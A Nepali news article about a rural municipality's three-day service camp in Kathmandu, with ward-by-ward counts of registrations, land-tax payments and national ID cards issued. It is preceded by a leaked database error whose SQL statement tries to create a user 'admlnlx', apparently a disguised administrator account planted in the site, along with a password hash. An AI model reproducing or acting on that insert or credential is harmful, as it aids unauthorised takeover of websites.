WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbM1vB6LTGguT1fA7s6QShS7fv8e8i1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:27:50', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । थुलुङ दुधकोशी गाउँपालिकाले काठमाडौंमा सुरु गरेको एकीकृत शिबिको पहिलो दिन तीन सय ७८ जनाले सेवा लिएका छन् ।
बर्खायाम भएका कारण आवागमनमा समस्या भएर गाउँपालिकासम्म पुग्न कठिनाई हुने भएका कारण काठमाडौंमा आएर बसोबास गरिरहेका स्थानीयहरुलाई सहज रूपमा सेवा पुर्याउने उद्देश्यले आजबाट सुरु भएको सो शिबिरको गाउँपालिका अध्यक्ष अशिम राईले उद्घाटन गरेका थिए ।
काठमाडौंको सुकेधारास्थित नवदुर्गा पार्टी भेन्युमा आजबाट सुरु भै तीन दिन सम्म सन्चालन हुने शिबिरमा सामाजिक सुरक्षा भत्ता दर्ता तथा नविकरण, मालपोत तथा भुमि कर संकलन, जन्म मृत्यु दर्ता, बसाई सराई, राष्ट्रिय परिचय पत्र वितरण लगायतका सेवा प्रवाह भइ रहेको थुलुङ दुधकोशी गाउँपालिकाका प्रबक्ता भोजराज कार्कीले जानकारी दिए।सेवा शिबिर सुरु भएको पहिलो दिन सबैभन्दा बढी संख्यामा राष्ट्रिय परिचयपत्र बितरण गरिएको उनले बताए ।
कुन वडाबाट कति जनाले लिए सेवा
वडा नम्बर- १ नेले
सामाजिक सुरक्षा भत्ता नविकरण- ९
जन्मदर्ता – २
नाता प्रमाणित – १
मालपोत – ३
वडा नम्बर- २ काङ्गेल
सामाजिक सुरक्षा भत्ता नविकरण – १५
मालपोत – ७
विबाह दर्ता -१
वडा नम्बर-३ पन्चन
नविकरण- १४
सिफारिस १
वडा नम्बर- ४ जुबु
सामाजिक सुरक्षा नविकरण- १३
वडा नम्बर- ५ जुबु
सामाजिक सुरक्षा भत्ता नविकरण- ११
अन्य सिफारिस- १
वडा नम्बर-६, मुक्ली
सामाजिक सुरक्षा भत्ता नविकरण -९ जन
बिबाहदर्ता – २
जन्मदर्ता- ३
मृत्युदर्ता- १
वडा नम्बर ७ देउसा
सामाजिक सुरक्षा भत्ता नविकरण- १७
जन्मदर्ता- ६
बिबाह दर्ता – १
मालपोत – १३
अन्य सिफारिस -३
वडा नम्बर ८ देउसा
नविकरण- २७
मालपोत- ३
विबाहदर्ता – २
जन्मदर्ता – ३
वडा नं ९ लोखिम
सामाजिक सुरक्षा भत्ता नविकरण- १६
मालपोत – १०
जन्मदर्ता- ३
बसाइँसराइ- १
अन्य सिफारिस – ७ वटा
राष्ट्रियपरिचयपत्र वितरण – १७३